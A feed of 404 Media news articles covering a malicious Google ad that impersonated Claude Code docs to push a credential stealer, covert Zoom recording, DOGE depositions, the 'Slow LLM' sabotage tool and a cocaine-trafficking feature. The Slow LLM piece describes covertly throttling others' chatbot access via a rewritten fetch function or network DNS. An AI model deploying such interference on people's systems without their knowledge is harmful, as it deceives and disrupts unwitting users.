MoreRSS

site icon404 MediaModify

A journalist-founded digital media company exploring the ways technology is shaping–and is shaped by–our world.
Please copy the RSS to your reader, or quickly subscribe to:

Inoreader Feedly Follow Feedbin Local Reader

Rss preview of Blog of 404 Media

A Top Google Search Result for Claude Plugins Was Planted by Hackers

2026-03-24 21:35:37

A Top Google Search Result for Claude Plugins Was Planted by Hackers

A top result on Google for people searching for Claude plugins sent users to a site that recently contained malicious code in an apparent attempt to steal their credentials. 

The news shows how the explosion of interest in generative AI tools is giving hackers new ways to attack users.

The malicious site was flagged to us by a 404 Media reader who was using Claude. 

“I was googling to troubleshoot how to get my Claude Code CLI to authenticate its github plugin to my Github account and may have stumbled upon a malicious site hosted on Squarespace of all places,” the reader, Dan Foley, told me in an email. 

Foley searched for “github plugin claude code” and the top result was a sponsored ad for a Squarespace site with the title “Install Claude Code - Claude Code Docs.”

When he clicked through, he saw a site that was pretending to be the official site for Anthropic’s Claude with identical design and branding.

A Top Google Search Result for Claude Plugins Was Planted by Hackers

The phony Anthropic help site had swapped some of the Claude Code installation instructions for others, Foley pointed out. That included a line users could paste into their terminal to allegedly install the software on a Mac. The command included an obfuscated URL, hiding what its real destination was. When Foley decoded it, he found it downloaded software from another site entirely. 

ThreatFox, a platform for sharing known instances of malware, recently flagged that domain as sharing a “stealer”, a type of malware that steals users credentials. ThreatFox linked that domain to the stealer as recently as a few days ago.

Google’s ad center listed the advertiser behind the malicious sponsored search result as “Enhancv R&D,” which is based in Bulgaria, according to a screenshot of the advertiser profile Foley shared with 404 Media. The advertiser was also listed as being verified by Google, meaning they had to complete an identity verification process which requires legal documentation of their name and location. 

Foley said he flagged the ad to Google, which removed the site from search results. The URL which pointed to the potential stealer is no longer online. 

“We removed this ad and suspended the account for violating our policies,” a Google spokesperson told me in an email. Google said it has strict policies against ads that aim to phish information or distribute malware, and that it uses a combination of Gemini-powered tools and human review to enforce these policies at scale. Google claims the vast majority of these ads are caught before the ads ever run. 

Malicious links included in paid Google ads that are pretending to be legitimate websites is not a problem that’s unique to AI. Hackers often try to get users to click malicious links by pretending to be whatever is popular on the internet at any given moment, be it a pirated movie or video game just before release or celebrity sex tapes. The fact that hackers are targeting Claude users reflects the growing popularity of AI tools and the hackers’ hope that users are not careful enough to check what they’re clicking when using them. 

In January, we wrote about how hackers could similarly target users of the AI agent tool OpenClaw by boosting instructions for AI agents that contained a backdoor for hackers.

This Company Is Secretly Turning Your Zoom Meetings into AI Podcasts

2026-03-24 21:00:13

This Company Is Secretly Turning Your Zoom Meetings into AI Podcasts

WebinarTV, a company that bills itself as “a search engine for the best webinars,” is secretly scanning the internet for Zoom meeting links, recording the calls, and turning them into AI-generated podcasts for profit. In some cases, people only found out that their Zoom calls were recorded once WebinarTV reached out to them directly to say their call was turned into a podcast in an attempt to promote WebinarTV’s services. 

WebinarTV claims to host more than 200,000 webinars. It’s not clear how it’s recording so many Zoom calls without permission, but in some cases the stolen videos posted to WebinarTV can put call participants at risk. 

Judge Allows DOGE Deposition Videos Back Online

2026-03-24 04:28:37

Judge Allows DOGE Deposition Videos Back Online

On Monday a judge said videos of recent depositions from DOGE members can be published online once again. The ruling is something of an about face for Judge Colleen McMahon, who originally ordered plaintiffs in the DOGE-related lawsuit “claw back” the videos they had published to YouTube. The videos were already massively viral at the time of that ruling, in part because they showed DOGE members Justin Fox and Nate Cavanaugh unable or unwilling to define DEI, admitting their use of ChatGPT to filter contracts to potentially axe based on words like “Black” and “homosexual” but not “white,” and were broadly one of the first times the public has directly heard from people inside DOGE.

“This decision validates our position that the publication of the videos, which document a process to destroy knowledge and access to vital public programs, was indeed in the public’s interest,” Joy Connolly, president of the American Council of Learned Societies, said in a statement shared with 404 Media. “We look forward to continuing the pursuit of justice in reclaiming government support for important humanities research, education, and sustainability initiatives.”

This Web Tool Sabotages AI Chatbots By Making Them Really, Really Slow

2026-03-23 23:20:26

This Web Tool Sabotages AI Chatbots By Making Them Really, Really Slow

Watching people outsource their critical thinking, emotions, and sanity to glitchy “AI” chatbots has been one of the most uniquely terrifying aspects of being a human being in recent years. 

While wealthy tech evangelists like Sam Altman continue to make wild proclamations about how large language models (LLMs) are destined to do our jobs and raise our children, critics have compared Silicon Valley’s attempts to force dependence on chatbots to a mass-enfeebling event—an attempt to convince people that they are actually better off having machines think, act, and create for them.

Now, there’s a new way to discourage friends, family, and even complete strangers from turning to chatbots like Claude and ChatGPT: by using a tool called “Slow LLM” to make them really, reaaaaalllyyy slowwwww. Or at least, making them look that way.

“Are you concerned that you or your loved ones might be participating in a massive de-skilling event? Experiencing LLM-induced psychosis? Outsourcing cognitive and emotional functions to autocomplete? Install SLOW LLM on your computer, or the computer of a loved one, today!” reads a description on the tool’s website.

Created by artist Sam Lavigne, Slow LLM causes anyone accessing AI chatbots on a computer or network to encounter mysterious, painfully slow response times. It works by manipulating a quirk in the Javascript language to rewrite the “Fetch” function that returns data to the browser. When a user visits a chatbot domain and enters a query, the modified Fetch function stretches the response over an excruciatingly long period of time. This results in the user perceiving the LLM to be running slowly, when in reality it’s simply being arbitrarily metered by Lavigne’s code.

Lavigne says that the idea for the project came after seeing how deeply some of his students and acquaintances had come to rely on generative tools to do basic tasks.

“So many people are starting to use these tools to outsource their cognitive and emotional functions, and in the process of doing this they’re forgetting all these basic things that they’ve learned how to do,” Lavigne told 404 Media. “I think that the more people rely on LLMs, the more extreme this de-skilling event will become.”

Slow LLM can be installed as a Chrome browser extension, but it can also be deployed network-wide via an “Enterprise Edition,” a DNS service which causes everyone on a home, school, or corporate network to experience slow chatbot responses. This is done by simply changing the DNS server on your router to Lavigne’s custom domain—though he warns that using a random person’s DNS is generally not a great idea cybersecurity-wise, and recommends the safer option of hosting your own DNS server to deploy the Slow LLM code, which he has released for free on Github. The browser extension currently only affects Claude and ChatGPT, while the DNS version also slows down Grok and Google Gemini.

“The idea was that these things are removing friction, so let’s add some friction back in,” said Lavigne, using the engineering term frequently used by tech bros to describe inefficiencies in a system. He argues that LLM chatbots have taken this idea of “friction” to an extreme, presenting any unpleasantness or difficulty we encounter as something that should be outsourced to Silicon Valley’s thinking machines—even if overcoming that difficulty is part of what makes human creativity meaningful and worthwhile. “Anything that removes the friction of something that’s difficult, it makes you not learn, and it removes the learning you’ve already achieved.”

In theory, one could activate Slow LLM without anyone noticing; most people would likely assume that chatbot providers like Google and OpenAI are having technical issues, which does happen without outside interference from time to time. Lavigne says that so far, he hasn’t heard from anyone that has successfully deployed Slow LLM on a work or school network. But he certainly isn’t discouraging people from trying.

“I have not yet tested it on any unwitting subjects, but I’m thinking about it,” Lavigne said in a mischievous tone, adding that it would be an interesting experiment to see how people react when presented with artificially-slow chatbots. “Maybe they’ll just rage-quit LLMs.”

Slow LLM is the latest addition to a series of impish tech provocations that Lavigne has become known for. During the height of the pandemic Zoompocalypse in 2021, he released “Zoom Escaper,” a tool that floods your Zoom audio stream with annoying echoes, distortions, and interruptions until your presence becomes unbearable to others. In 2018, he infamously scraped public LinkedIn profiles to build a massive database of ICE agents, which was subsequently removed from platforms like Github and Medium. Lavigne’s frequent collaborator Tega Brain has also released browser tools like “Slop Evader,” which filters out generative AI slop by removing all search results from after November 2022, when ChatGPT was first released to the public.

“I’ve been doing these little experiments in digital sabotage where I’m trying to make these tools that mildly interrupt computational systems,” said Lavigne. “One of the things I’ve been thinking about is how if the means of production is truly in our hands, and it’s also the way we’re communicating with other people and managing our social life, then what does it mean to interrupt productivity?”

Lavigne is not an absolutist, however. Without prompting, he admitted that he used Claude to help write some of the code for Slow LLM—until, of course, Slow LLM started working and forced him to complete the project on his own. Instead, Lavigne says he’s trying to make people question the habits they are forming by regularly using chatbots, tools which tempt us to essentially entrust all our knowledge, decision-making, and emotional well-being to massive companies run by tech billionaires like Altman and Elon Musk.

“My hope is to get people to think a little bit more about their usage of these tools,” said Lavigne. “But the broader thing I want people to think about […] is ways of interrupting these flows of data, these flows of power, and putting friction into these computational systems that are mediating so many parts of our lives.”

Ridicule as Praxis (with Emily Bender and Alex Hanna)

2026-03-23 21:37:56

Ridicule as Praxis (with Emily Bender and Alex Hanna)

This week, Sam talks to Emily Bender and Alex Hanna about the marketing ploys of “artificial intelligence,” why ridicule works to keep big tech’s claims in check, and what makes them hopeful for the future. They’re the authors of The AI Con: How to Fight Big Tech’s Hype and Create the Future We Want.

Dr. Alex Hanna is a writer and sociologist of technology, labor, and politics. She’s the Director of Research at the Distributed AI Research Institute (DAIR) and a Lecturer in the School of Information at the University of California Berkeley. Dr. Emily M. Bender is a Professor of Linguistics at the University of Washington where she is also the Faculty Director of the Computational Linguistics Master of Science program and affiliate faculty in the School of Computer Science and Engineering and the Information School.

They also host the The Mystery AI Hype Theater 3000 podcast which “deflates AI hype and draws attention to the real harms of the automation technologies we call ‘artificial intelligence’.” 

Listen to the weekly podcast on Apple Podcasts, Spotify, or YouTube. Become a paid subscriber for access to this episode's bonus content and to power our journalism. If you become a paid subscriber, check your inbox for an email from our podcast host Transistor for a link to the subscribers-only version! You can also add that subscribers feed to your podcast app of choice and never miss an episode that way. The email should also contain the subscribers-only unlisted YouTube link for the extended video version too. It will also be in the show notes in your podcast player.

Flood of AI-Generated Submissions ‘Final Straw’ for Small 22-Year-Old Publisher

The AI Con

Emily’s cartoon 

"Questioning the Normalization of Surveillance" by the Center on Privacy & Technology at Georgetown

"You Are Not a Parrot" at NY Mag

An Adrenaline Junkie Millionaire’s Quest to Become a Cocaine Kingpin

2026-03-23 21:00:14

An Adrenaline Junkie Millionaire’s Quest to Become a Cocaine Kingpin

The British de Havilland DH-112 Venom is one of the most iconic combat jets of the Cold War, with a distinctive two-pronged tail design that stretched out far behind the main body of the aircraft and a striking red and black paint job. It also gained a reputation for handling issues at high speeds. And yet, that was the aircraft 50-year-old Marty Tibbitts flew one summer afternoon at a Wisconsin air show in July 2018.

Tibbitts, a millionaire who made his money launching call center businesses, regularly flew, and bought, historical aircraft like the Venom. He ran the World Heritage Air Museum in his home state of Michigan, which housed his collection of around a dozen planes.

Sat in the Venom’s cockpit, Tibbitts maneuvered the plane along the runway behind another aircraft. The first plane took off. About eight seconds later, two seconds sooner than he was supposed to, Tibbitts pulled the Venom’s stick back and brought his craft into the air.

Immediately something was wrong. People on the ground saw the Venom’s wings rock back and forth shortly after its sluggish takeoff, a sign that it might be caught in the wake of the first plane. One video showed the Venom started to make a shallow left turn, and the plane’s engine sound decreased and then rapidly increased. Black smoke billowed. The plane stalled. As the aircraft barely reached 200 feet, it started to descend with its nose still pointed upwards. 

💡
Do you know anything else about Marty Tibbitts or Ylli Didani? I would love to hear from you. Using a non-work device, you can message me securely on Signal at joseph.404 or send me an email at [email protected].

Tibbitts crashed into a nearby barn with another two people inside. Flames engulfed the plane and set the barn and other nearby buildings on fire too.

“We got a plane down!” a man yelled in a 911 call. “Building’s on fire!” Tibbitts died in the crash.

A day later Tibbitts’ brother, JC, gave a statement to local media: “Our family is devastated by the loss of Marty. To say he was passionate about all things in his life—family, business and aviation would be to immensely understate the case. He died pursuing one of his passions,” it read. “Beyond his family, friends and business associates, many will miss this unique and special person.”

As news of Tibbitts’ death spread, his wife received a phone call from one of those business associates. He was crying on the other end of the line. “It can’t be true, it can’t be true,” the man said.

An Adrenaline Junkie Millionaire’s Quest to Become a Cocaine Kingpin
A screenshot of a U.S. court record including photos of Didani.

The man in tears on the phone was Ylli Didani, a now convicted cocaine trafficker who orchestrated massive shipments of drugs into the UK and multiple European ports. Tibbitts, it turned out, had a secret life. Without the knowledge of his family, Tibbitts worked closely with Didani to become an aspiring international drug lord. The pair commissioned the construction of an elaborate underwater drone that would be stuffed with cocaine and latch onto ships with magnets. Tibbitts was the money and brains behind the operation, funding the submarine’s design and development. In messages with Didani, he referred to himself as Tony Stark, the alter ego of the millionaire inventor and superhero Ironman. According to investigators, Didani’s cocaine trafficking business was worth tens of millions of dollars. Didani had now lost his business partner and friend.

Extensive interviews with Didani, including over the email system of the prison he is currently incarcerated in, and thousands of pages of court transcripts reviewed by 404 Media reveal the story of a millionaire who, even with his massive fortune, wanted more and more. Tibbitts wanted to pillage Egyptian tombs for artefacts, and become an ambassador to Albania. He allegedly invested in a company making flying cars, tried to source Black Hawk helicopters to sell to other countries, and arranged a massive load of cash to be flown on his private jet to buy bulk cocaine. Tibbitts, who was at one point a primary target during the investigation into the cocaine group’s operations, left a gaping question with his death: why did he do it? Why did the man who had everything lead a secret double life as an international drug kingpin?